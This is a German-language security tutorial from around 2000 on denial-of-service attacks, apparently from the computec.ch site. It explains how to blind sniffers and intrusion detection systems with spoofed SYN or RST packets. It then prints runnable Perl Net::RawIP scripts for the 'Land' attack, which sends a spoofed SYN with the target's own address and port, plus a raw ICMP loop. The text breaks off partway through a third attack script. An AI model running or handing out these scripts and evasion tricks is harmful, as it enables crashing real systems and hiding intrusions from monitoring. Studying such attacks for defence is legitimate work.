<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Author" content="Marc Ruef">
   <meta name="GENERATOR" content="VIM 5.4 [de] (Bash; I; Linux 2.2.13 i686) [w3m]">
   <meta name="Description" content="Computer-Sicherheit">
   <meta name="KeyWords" content="Computer, Security, Hacking, Cracking, Phreaking, Hacker, Cracker, Phreaker, Kryptoanalyse, Kryptologie, Kryptografie, DES, 3DES, IDEA, DEA, AES, PGP, CCC, Kryptocrew, Internet, Firewall, VPN, Encryption, ISDN, Verschl�sselung, Trojaner, Trojanisches Pferd, Virus, Viren, Virii, Backdoor, Source, Unix, Linux, Windows, MacOS, Nokia, MiniDisc, Chipcards, Chipkarte, Chipcard, Sicherheit, Technik">
   <title>DoS (Denial of Service)</title>
</head>
<body>
<b><font size=+4>DoS (Denial of Service)</font></b>
<br><font point-size="10">Geschrieben von Marc Ruef &lt;<a href="mailto:marc.ruef@computec.ch?subject=DoS (Denial of Service)">marc.ruef@computec.ch</a>>
f&uuml;r <a href="http://www.computec.ch/">http://www.computec.ch/</a></font>
<br><font point-size="10">Version 3.1b 02. April 2000</font>
<br>
<hr WIDTH="100%">
<br><a NAME="1.0"></a><b><font size=+3>1.0 Inhaltsverzeichnis</font></b>
<blockquote><b><a href="#1.0">1.0 Inhaltsverzeichnis</a></b>
<p><b><a href="#2.0">2.0 Einf&uuml;hrung</a></b>
<p><b><a href="#3.0">3.0 Land</a></b>
<blockquote><a href="#3.1">3.1 Angriffsm&ouml;glichkeiten</a><a href="#3.1"></a>
<p><a href="#3.2">3.2 Schutzmassnahmen</a></blockquote>
<b><a href="#4.0">4.0 OOB (Out of Band)</a></b>
<p><b><a href="#5.0">5.0 IP-Fragmentierung (Ping of Death)</a></b>
<blockquote><a href="#5.1">5.1 Angriffsm&ouml;glichkeiten</a><a href="#5.1"></a>
<p><a href="#5.2">5.2 Schutzmassnahmen</a></blockquote>
<b><a href="#6.0">6.0 Smurf</a></b>
<p><b><a href="#7.0">7.0 SYN-Flooding</a></b>
<p><b><a href="#8.0">8.0 Teardrop</a></b>
<p><b><a href="#9.0">9.0 Ping-AT-Attacke</a></b>
<p><b><a href="#10.0">10.0 Snork</a></b>
<blockquote><a href="#10.1">10.1 Schutzm&ouml;glichkeiten</a></blockquote>
<b><a href="#11.0">11.0 Mailbombing, Spam, Junk-Mail</a></b>
<blockquote><a href="#11.1">11.1 Die Geschichte des Spam</a><a href="#11.1"></a>
<p><a href="#11.2">11.2 Die Lage heute</a><a href="#11.2"></a>
<p><a href="#11.3">11.3 Schutzm&ouml;glichkeiten</a></blockquote>
</blockquote>
<a NAME="2.0"></a><b><font size=+3>2.0 Einf&uuml;hrung</font></b>
<blockquote>Denial of Service ist ein Synonym f&uuml;r die Kunst bzw. den
Unsinn des Verhinderns eines Zugriffs oder Nutzens eines Computers. Denial
of Service bedeutet soviel wie etwas unzug&auml;glich machen, oder ausser
Betrieb setzen. Diese Attacken nutzen immer Bugs und Schwachstellen von
Programmen, Betriebssystemen oder Fehlimplementationen von Protokollen
aus. Es existieren daher auch verschiedene Formen einer DoS-Attacke.
<p>Entgegen der allgemein g&uuml;ltigen Meinung k&ouml;nnen auch Netzwerkscanner,
Sniffer und IDS (Intrusion Detect Systeme) von solchen Angriffen betroffen
sein. Der Grund daf&uuml;r ist, dass Sniffer stets auf dem Kernel des Betriebssystems
aufbauen, und somit von ihm abh&auml;ngig sind. Sniffer m&uuml;ssen einen
eigenen TCP/IP-Stack besitzen, da ihnen sonst das Ausf&uuml;hren eines
Trace einer Netzwerkverbindung verwehrt bleiben w&uuml;rde. Die meisten
freien und kommerziellen Scanner haben dabei ein kleines Problem: Sind
sie auf Spurenverfolgung einer Verbindung, so sind sie nicht mehr in der
Lage, andere Verbindungen gleichzeitig zu observieren. Um diese Aufgabe
bew&auml;ltigen zu k&ouml;nnen, m&uuml;ssten sie gleichzeitig die Arbeit
aller TCP/IP-Stacks im Netzwerk auf sich nehmen, wobei dies von der Rechenleistung
einer einzelnen CPU nicht verlangt werden kann. Daher entgeht ihnen stets
ein grosser Prozentsatz des gesamten Traffics.
<p>Ein Angreifer muss sich bei einer dynamischen Attacke stets auf zwei
Rechner beschr&auml;nken, wie dies bei aktiven IDS (Intrusion Detection
Systeme) der Fall ist. Sniffer und Netzwerkscanner, die auf einem Server
zur &Uuml;berwachung eines einzelnen Ports abgerichtet sind, k&ouml;nnen
mit einem einfachen Trick sillgelegt werden: Bevor er sich zum Beispiel
via Telnet auf Port 23 einloggt, sendet er ein gespooftes SYN-Paket. Falls
ein Sniffer nun aktiv ist, wird er logischerweise nach Erhalt und Analyse
des gespooften Pakets die Verbindung auf Port 23 im Auge behalten. So kann
sich der Angreifer danach einloggen, ohne dass der Sniffer das Passwort
mitscannen kann. Nach einer gewissen Zeit, wenn der TCP/IP-Stack die Verbindung
aufgrund des Timeouts kappt, ist der Sniffer wieder regul&auml;r aktiv.
<p>Ein weiteres Problem besteht darin, dass ein Sniffer nicht wirklich
in eine Verbindung hineinschauen kann. Er nimmt also am Datenaustausch
nicht bei, wie das bei den beiden beobachteten Rechnern der Fall ist. Er
trifft aus diesen Gr&uuml;nden bez&uuml;glich IP- und TCP-Paketl&auml;nge
bestimmte Annahmen und interpretiert die Pakete nach diesem Standartschema.
Wird nun eine &Auml;nderung bez&uuml;glich der L&auml;nge des TCP-Headers
und der sporadischen Einschleusung von falschen Pr&uuml;fsummen vorgenommen,
die nicht mehr der zuvor errechneten L&auml;nge entsprechen, kann er die
Inhalte der Pakete nicht mehr korrekt interpretieren. Der Sniffer &uuml;berpr&uuml;ft
die TCP-Pr&uuml;fsummen nicht mehr, wobei die Kernel der betroffenen Systeme
diese "falschen" Pakete einfach verwerfen werden und somit die &Uuml;bertragung
korrekt ausf&uuml;hren. Sniffer brechen zum Teil auch nach einem FIN- oder
RST-Paket ihre &Uuml;berwachung ab. Befindet sich einer dieser jedoch in
einem TCP-Paket mit weit entfernter Sequenznummer, so werden die zu &uuml;berwachenden
Rechner dieses verwerfen und mit ihrer &Uuml;bertragung normal fortfahren.
Der Sniffer hingegen h&auml;lt die Verbindung f&uuml;r beendet, und er
stellt seine Arbeit ein. Manche Betriebssysteme, wie zum Beispiel Windows
NT und Digital Unix, &uuml;berpr&uuml;fen bei einem RST die TCP-Sequenznummern
nicht. Sind also auf einem solchen System Sniffer aktiv, ist es einem Angreifer
leicht m&ouml;glich, diese mit einem gespooften Paket mit gesetztem RST-Flag
in einen passiven Zustand f&uuml;r die kommenden Pakete zur&uuml;ckzusetzen.</blockquote>
<a NAME="3.0"></a><b><font size=+3>3.0 Land</font></b>
<blockquote>Diese Angriffsart ist seit Ende 1997 bekannt, und es handelt
sich hierbei um eine der letzten Varianten der DoS-Attacken, welche beachtliche
Popularit&auml;t erlangte. Durch die Land-Attacke wird ein sehr komplexer
Angriff ausgef&uuml;hrt, welcher ein SYN-Paket mit identischer Absender-
und Empf&auml;ngerport erzeugt. Anschliessend wird dieses Paket an einen
offenen Port gesendet, wo das Paket durch die vielen IP-Stacks eine Art
Race-Condition erzeugt, und dadurch das System des Opfers lahmlegt.
<p><a NAME="3.1"></a><b><font size=+2>3.1 Angriffsm&ouml;glichkeiten</font></b>
<blockquote>Hier nun einige Beispiele f&uuml;r Land-Angriffe:
<p><tt>#!/usr/bin/perl</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
require 'getopts.pl';</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
use Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Getopts('i:p:');</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a = new Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
die "Usage $0 -i &lt;target> -p &lt;target port>" unless</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ($opt_i
&amp;&amp; $opt_p);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->set({ ip => {saddr => $opt_i,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
daddr => $opt_i</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
},</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
tcp=> {dest => $opt_p,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
source => $opt_p,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
psh => 1,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
syn => 1}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->send;</tt>
<p>Die Flags (psh, syn,...) k&ouml;nnen beliebig im vorgegebenen Rahmen
ver&auml;ndert werden, wobei bei korrekten Kombinationen Windows NT-Cluster
(Tandem, Wolfpack,...) aussteigen.
<p>Eine andere M&ouml;glichkeit besteht in einem simpel erscheinenden Ping:
<p><tt>#!/usr/bin/perl</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
use Net::RawIP qw(:pcap);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a = new Net::RawIP ({icmp =>{}});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->set({ip => {saddr => 'www.intra.net', # insert your site</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; here !</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
daddr => $ARGV[0]},</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
icmp => {type => 8, id => $$}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$device = 'eth0'; # insert your device here !</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$filt = 'ip proto \\icmp and dst host my.site.lan';#</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; insert your
site here!</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$size = 1500;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$tout = 30;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$pcap = $a->pcapinit($device,$filt,$size,$tout);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$i =0;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(fork){</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
loop $pcap,-1,\,\@a;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
else{</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
sleep 2;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
for(;;){</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->set({icmp => {sequence => $i,data => timem()}});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->send(1,1);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$i++</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
sub dmp{</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my $time = timem();</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->bset(substr($_[2],14));</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my @ar = $a->get({ip => [qw(ttl)], icmp=>[qw(sequence</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; data)]});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("%u bytes from %s: icmp_seq=%u ttl=%u time=%5.1f</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ms\n",length($ar[2])+8,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
,$ARGV[0],$ar[1],$ar[0],($time-$ar[2])*1000);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<p>Folgender Quelltext kann unter Umst&auml;nden seinen Sinn verlieren,
da sich verschiedene Unix-Distributoren, darunter Linux 2.2 und BSD, dass
dank einem Pr&uuml;fsummencheck im eigenen Betriebssystem b&ouml;sartige
Pakete die eigene Netzwerk-Device nicht verlassen d&uuml;rfen. Um die Wirkung
des Quelltextes zur&uuml;ckzugewinnen, muss unter Linux der direkte Zugriff
der Device im Kernel durch das Setzen der Y-Flag von "Socket" und "Config
Netlink Socket" erfolgen. Dadruch haben jedoch auch einfach User des Systems
Zugriff auf die Netzwerkdevice. Diese Option sollte man als Systemadministrator
stets deaktiviert haben, da sonst User Angriffe vom eigenen WWW-Server
mittels CGI-BINs fahren k&ouml;nnen.
<p>Mit folgendem Beispiel wird ein weiterer Angriff gestartet, wobei "saddr"
und die TCP/IP-Flags zu varriieren sind:
<p><tt>#!/usr/bin/perl</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
require 'getopts.pl';</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
use Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Getopts('t:n:');</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
die "Usage $0 -t &lt;ip of the target> -n &lt;thousands of the</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; times>"
unless ($opt_t &amp;&amp; $opt_n);</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
@data = split (//,"0"x20);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$p = new Net::RawIP({</tt>
